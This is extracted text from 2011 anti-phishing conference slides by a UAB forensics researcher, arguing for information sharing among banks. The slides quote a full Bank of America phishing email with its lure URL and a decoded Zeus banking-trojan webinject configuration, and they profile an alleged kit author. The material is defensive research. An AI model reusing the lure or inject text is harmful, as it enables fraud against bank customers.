grupo de trabajo anti-phising // anti phising working group

Phishing: a Case for Information Sharing

Gary WarnerDirector of Research

in Computer Forensics

2

Some Phishing Numbers

Phishing: A Case for Information Sharing© The University of Alabama at Birmingham, 2011

New Phish First Date Seen

616 2011-06-01

647 2011-06-02

429 2011-06-03

340 2011-06-04

377 2011-06-05

752 2011-06-06

681 2011-06-07

742 2011-06-08

569 2011-06-09

485 2011-06-10

271 2011-06-11

360 2011-06-12

674 2011-06-13

In the month of May 2011 the UAB Phishing Intelligence system gathered evidence on 16,351 distinct phishing sites imitating 218 different financial institutions or brands.

In 2011 we’ve seen 85,797 distinct phishing URLs imitating 373 different financial institutions or brands.

We believe that less than 1% of these cases of computer intrusion for purposes of financial and identity theft are investigated as a crime.

In other words, for 99% of these criminals, Crime Pays.

3

UAB Computer Forensics Research Laboratory

The goal of our research lab is to addressthis type of disparity in three ways:


#1 – training tomorrow’s cybercrime fighters #2 – providing better tools to law enforcement and investigative support for complex crimes#3 – educating the public about cyber threats and how to respond to them

4

Cybercrime Scholars


Since 2007 we have offered graduated students in Computer & Information Sciences or Justice Sciences a “Certificate in Digital Forensics”

Since 2010, undergraduates choosing a major/minor in Computer Science and Criminal Justice could apply for the “Internet Identity Scholarship”. This year four students will have their full tuition paid from a pool of more than twenty applicants.

Beginning in 2011, we also offer a Masters in Computer Forensics & Security Management (MS-CFSM).

We strongly support the APWG “eCrime Researchers Summit” to encourage other academics to pursue cybercrime studies.

5

Cybercrime Research

Our 35-workstation lab is divided into three areas:- Spam & Phishing Lab- Malware & Forensics Lab- Investigators Bullpen

The spam & phishing lab provides access to more than 500 million spam email messages in the UAB Spam Data Mine and to the UAB PhishIntel system. More than 200 investigators have accounts to PhishIntel today.

The malware & forensics lab supports local, federal, and international law enforcement on cases involving malware or complex data environments.


6

Big Computers for Big Evidence


This is a picture of the “Rushmore” cluster

16 Pentium cores on 14 servers = 224 processors dedicated to analyzing cybercrime data

Sharing investigative data with agencies such as: - Alabama Bureau of Investigation- FBI Cyber- DHS’s ICE (Immigration and Customs)- Drug Enforcement Agencies “Pharm & Chem Internet Investigations” team- Germany’s BKA (Bundes Kriminal Amt)- Netherlands High Tech Crimes Unit-UK’s Serious & Organised Crime Agency

7

UAB’s Phishing Process


From “Reeling in Big Phish with a Deep MD5 Net” by UAB’s Wardman, Warner, Turner & McCalley

8

Typical Phishing Site


Here’s a typical phishing site. This one is hosted on “violinocaffe.com”, a website that has been hacked by the phisher.

After hacking the server, the criminal uploads his “phishing kit” and unpacks it to create this website on that server.

9

Not all criminals are the same

–


Without additional data, you do not know which phishing site was created by a twelve year old as a prank and which are being run by million dollar crime syndicates

10

Patterns


Series10

10

20

30

40

50

60

70

Victims Per Site

Victims Per Site

If we agree that some sites have more victims than others, how could we determine this?

How will this impact our behavior?

11

Patterns


Just because a site captured the most userids and passwords does not mean it is responsible for the greatest financial losses.

How could we tie losses to sites?

12

Patterns

– In that example, the criminal has created an unfortunate “signature” for himself.

– He sampled the real bank’s website during “Black History Month”.

– Only one criminal group was doing this. We used that information to justify a search.


13

Which Phishing Group is your priority?


14

UAB PhishIntel for BBVA


A live phish . . .

15Phishing: A Case for Information Sharing© The University of Alabama at Birmingham, 2011

Asks for our password


Asks for our Security Questions


Then sends us to Real Bank site

In the BBVA Compass log files there will be a ‘referrer tag’ telling us that the customer who has just arrived at our website came from “mojaishrana.info”

This will help us identify customers who may have become victims, and to also measure the impact of this particular phish.


19

Seven Steps of a Phishing Investigation

• Spam Analysis• Site Analysis• Kit Analysis• Phish Clustering• Log Analysis• Search Warrant Analysis• Open Source Intelligence


UAB offers training to law enforcement and corporate investigators on the topic of phishing, based on our “Seven Steps of a Phishing Investigation” methology.

We won’t go into deep detail here, as its intended as an all-day class. . . .

20

Automated Kit Extraction

– Here’s an example of how the email addresses found in kits are useful.

– Today we had two Bank of America phishing sites that both contained the same “drop email address” – the email account to which the stolen credentials are sent.


Sometimes we learn their email addresses

In this example:

[email protected]

[email protected]

[email protected]

[email protected]

All receive the stolen credentials by email.


mailto:[email protected]





22

UAB PhishIntel


In this example, [email protected] has been found in eight different Paypal phishing sites dating back to March 12th and ranging up to June 14th.


PhishIntel email reportThe email report proves that this email address,

[email protected]

Was also used on the websites:Designhotelbarcelona.comMirorestobar.com.uyRaioreformaseoye.comInequal.comPoderciudadano.com.arAdonaimiami.comYamburara.comDustproductions.se

Three of those were BBVA phish, but six others were Santander phish.



1 phisher – 49 sites

• Using this technique, last week we discovered a phisher using the emails [email protected] and [email protected] has successfully used 49 phishing sites from May 15 to June 28th.

• 4 Bank of America, 1 Egg Bank, 1 Halifax, 3 HSBC, 1 M&T, 5 Regions Bank, 2 Royal Bank of Canada, 6 Santander, 3 US Bank and 22 sites against the British Tax authority, Her Majesty’s Revenue Collection Service.




Information Sharing

• How would any of those banks know that another bank was investigating this criminal?


26

Turnkeyconcepts.com


27

The “Kit” for the phish


28

Hidden in each of his kits is a backdoor.


See the line that has “eval(base64_decode”?

When we base64 Decode that blob of text, we find the hidden email address:

[email protected]

So, while today’s copy of this phishing kit sends its stolen credentials to [email protected] secretly ALSO sends the stolen data to “f9ih.carlos” which is an alias for “shady-flow”.

We’ve seen this 30 times so far this year.



29

Open Source Intelligence– The Kit reveals that it’s author was:

• [email protected]– shady-islam, on the Arabic language hacker website

“arhack.net” also uses that email as his MSN chat handle according to his signature.

– Shady-islam signs all of his emails with an anti-Israeli statement about the Jewish oppressors killing apostles and prophets and ending with:

– العزة و الجالل ذا يا غزة فى المسلمين حرر اللهم– “Oh God, Lord of Might and Glory, free the Muslims of Gaza”



30

Open Source Intelligence


Here’s Shady-Flow’s Facebook page, where he reveals that he works as a DJ at “FL Studio” in Casablanca, Morocco since February of 2007.

His high school must have been pretty interesting, as it was named “Hacking world.”

31

UAB Spam Data Mine

– Since we also have the UAB Spam Data Mine, we can search for a copy of the email that sent this phish:

– select * from spam_link natural join spam where receiving_date = '2011-06-13' and machine = 'www.turnkeyconcepts.com';

– iid.11Jun13.0645.5834 | www.turnkeyconcepts.com | /Testimonials_files/Bankofamerica.com/Boa/index.html | Bank Of America Alert: You have 1 new Security Message. | Bank Of America N/A | alert.security | bofa.com | 212.5.219.68/32 | 2011-06-13 | | Jun-13-2011 |


32

Copy of the email from the UAB Spam Data Mine

Security Precaution,

For optimal viewing of the Bank of America Web site, we recommend that you enable CSS.We at Bank Of America work hard to ensure the security of our clients, In carrying out our responsibility, We recently had cause to suspect that there has been attempts to log into your account, There were multiple password failures during the course of the illegal attempt to log into your account. Though the attempts were unsuccesful We need you to re-confirm your account information by filling in your precise and current account information. If this is not completed within the next 8hrs, we will be forced to suspend your account indefinitely.

To re-confirm, Please Sign on and verify your identity:

Sign On

Bank Of America helps you to plan your financial future. Thank you for helping us protect your account

Sincerely, Bankofamerica.comSecurity Advisor

===================The words "Sign On" are a link to the phishing website: http://www.turnkeyconcepts.com/Testimonials_files/Bankofamerica.com/Boa/index.html


33

“Free” backdoored web kits


These “free” kits contain back doors that cause the users of the kits to actually also send all stolen credentials to the Kit Creators.

Collectively these are known as “Mister Brain Kits” after the most prevalent group doing these scams out of Morocco.

Chase kit “Action” fileThe downloader of the kit is instructed that the only thing he has to do is update the “$send” variable in this action file with his own email address.

He misses the “include” statement at the top. The included file populates a new variable “$IP” with the kit authors email address [email protected]

The “send array” at the bottom makes sure that BOTH emails get the stolen data.



35

A Mister Brain example


36

Some Success – but still a drop in the bucket

Phishing: A Case for Information Sharing© The University of Alabama at Birmingham, 2011 36

Recently Romanian authorities, working on tips developed with the FBI’s Internet Crime & Complaint Center, arrested 70 hackers

The FBI’s Legal Attache to Romania says cyber criminals in that country steal “hundreds of millions of dollars each year” from North Americans.

37

Very Organized Crime: Operation Phish Phry


32 Indictments in an example of a US-based organized crime phishing group

38

Brand Impact varies widely(2011 to date numbers)

# of brands seen # of sites seen 3 5000+ sites12 1000-4999 sites59 100-999 sites41 25-99 sites45 10-24 sites46 5-9 sites73 2-4 sites96 1 site


39

Zeus

– Zeus is a “keylogging” botnet responsible for stealing many millions of userids and passwords last year.

– Zeus can also use infected computers for remote control.

– This means they can log in to your bank from your customer’s computer, using the correct userid, password, cookie file, browser, IP address and computer.


40

Zeus Arrests

– While some criminals who use Zeus were arrested last year in the USA, United Kingdom, and Ukraine, many people have the source code and many criminals are using this botnet software.

– To learn more about the Zeus arrests, read about “Operation Trident BreACH” from the FBI


41

Zeus & Information Sharing

– In the same way that one criminal attacks many banks with phishing, one criminal also can attack many banks with malware.

– Zeus contains an encrypted “configuration file” that contains a list of URLs. If the user visits any of those URLs, special actions may occur.


42

Zeus Action Example– Here is one we decoded last summer:

• +++++++++++++++++++++++++++++++++++++++++++++++++• Target URL: https://www.bbvacompass.com/contact/ • field 1: <head>• field 2: </body>• field 3: <title>Tresury Management wesite is currently

unavailable</title></head><body><center><img src="https://e-access.compassbank.com/bbw/brandimage/Login1?t=4" alt=""><br>Due to system maintenance, online Treasury Management will be unavailable for 24 hours. Please try to access this page at a later point or if you have any questions contact our technical support at 1-858-633-0539.</center>

• ++++++++++++++++++++++++++++++++++++++++++++++++– In this example, the displayed web page replaces the “Contact Us” link with

a message saying to call a telephone number controlled by the criminal instead.


43

Zeus Action Example

In that configuration file were found 176 different banking websites.

Unless they also decrypted the config file, none of those banks are aware that they are being targeted by the same criminal.


44

APWG – the Anti-Phishing Working Group

That is one of the purposes of the Anti-Phishing Working Group. The APWG exists to help banks that are being victimized by cybercriminals share information.In April, the APWG “Counter-eCrime Operations Summit” is for technical sharing between the members of the group who work on defending banks. In 2011 this meeting was in Malaysia. In 2010 it was in Sao Paulo, BrazilIn November, the APWG General Meeting is held with the “eCrime Researchers Summit” is a meeting where we encourage University scientists and researchers to work on problems to build better technology to fight cybercrime.


45


In addition to sharing between members, the APWG encourages the reporting of new phishing sites so they may be shared with all members.

We also work actively with Law Enforcement. I am the co-chair of the “Working with Law Enforcement” committee, and we look forward to working more closely with law enforcement around the world.


46


http://www.antiphishing.org/

For more details about meetings, and how to join.


http://www.antiphishing.org/

47

Working with UAB

At UAB, we also work closely with many banks, and with law enforcement. We provide information for free to law enforcement. We encourage banks to support our research through sponsorship, or by becoming a partner in our Center for Information Assurance and Joint Forensics Research.


48

Working with UAB

UAB is also always looking for students. We offer a Masters degree in “Computer Forensics and Security Management”We also are always looking for Computer Science students to seek our PhD or Masters Degree.We do have a Spanish-speaking faculty member, Dr. Thamar Solorio, who would be happy to serve as point of contact for potential PhD students from Spain and other countries represented today.Thamar specializes in Natural Language Processing and Artificial Intelligence, and works very closely with the UAB Computer Forensics Research Laboratory.


We Want To HelpGary WarnerDirector of Research in Computer ForensicsA Research Partnership betweenThe University of Alabama at Birmingham’s Department of Computer & Information Sciences& Department of Justice [email protected]+1.205.422.2113

For PhD student recruitingDr. Thamar [email protected]

Website:www.cis.uab.edu/forensics/

Blog:garwarner.blogspot.com

Spam as Evidence© The University of Alabama at Birmingham, 2011 49



http://www.cis.uab.edu/forensics/

http://www.garwarner.blogspot.com/

grupo de trabajo anti-phising // anti phising working group

Technology

phishing working

law enforcement

computer forensics

stolen data

email address

security management

computer amp

information